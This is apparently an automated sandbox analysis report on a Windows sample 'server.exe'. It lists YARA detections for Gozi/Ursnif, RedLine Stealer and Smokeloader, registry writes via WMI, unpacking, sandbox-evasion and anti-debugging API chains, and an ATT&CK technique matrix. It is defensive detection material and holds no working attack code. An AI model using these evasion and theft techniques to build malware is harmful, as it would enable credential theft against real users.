Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.524385059.0000000002BA6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.524298163.0000000002B80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown

Writes or reads registry keys via WMI

Source: C:\Users\user\Desktop\server.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\server.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\server.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\server.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Users\user\Desktop\server.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\server.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\server.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: server.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.524385059.0000000002BA6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.524298163.0000000002B80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23

Source: server.exe, 00000000.00000000.257940340.0000000002B56000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamegunshot.exe6 vs server.exe
Source: server.exe	Binary or memory string: OriginalFilenamegunshot.exe6 vs server.exe

Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_047E16DF	0_2_047E16DF
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_047E832C	0_2_047E832C
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_047E1D8A	0_2_047E1D8A

Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_0040110B GetProcAddress,NtCreateSection,memset,	0_2_0040110B
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_00401459 NtMapViewOfSection,	0_2_00401459
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	0_2_004019F1
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_047E421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_047E421F
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_047E8551 NtQueryVirtualMemory,	0_2_047E8551

Source: server.exe	ReversingLabs: Detection: 37%
Source: server.exe	Virustotal: Detection: 40%

Source: server.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\server.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_047E30D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_047E30D5

Source: C:\Users\user\Desktop\server.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@1/0

Source: C:\Users\user\Desktop\server.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\server.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\server.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\server.exe

Unpacked PE file: 0.2.server.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\server.exe

Unpacked PE file: 0.2.server.exe.400000.0.unpack

Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_047E7F30 push ecx; ret	0_2_047E7F39
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_047E831B push ecx; ret	0_2_047E832B
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_00414680 push ecx; mov dword ptr [esp], 00000004h	0_2_00414681
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_004146A0 push ecx; mov dword ptr [esp], 00000000h	0_2_004146A1

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,

0_2_00401000

Hooking and other Techniques for Hiding and Protection

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR
Source: Yara match	File source: 0.2.server.exe.4e394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.server.exe.47e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\server.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\server.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking system information)

Source: C:\Users\user\Desktop\server.exe

Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep

Source: C:\Users\user\Desktop\server.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\server.exe

API call chain: ExitProcess graph end node

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\Desktop\server.exe

Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,

0_2_00401000

Source: C:\Users\user\Desktop\server.exe	Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,		0_2_004019F1
Source: C:\Users\user\Desktop\server.exe	Code function: __crtGetLocaleInfoA_stat,		0_2_00411E1C

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_047E3BD3 cpuid

0_2_047E3BD3

Source: C:\Users\user\Desktop\server.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_00401D68

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_004015B0

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_047E3BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_047E3BD3

Stealing of Sensitive Information

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR
Source: Yara match	File source: 0.2.server.exe.4e394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.server.exe.47e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR
Source: Yara match	File source: 0.2.server.exe.4e394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.server.exe.47e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Windows Management Instrumentation	Path Interception	Path Interception	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	12 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Obfuscated Files or Information	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	21 Software Packing	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Account Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	124 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
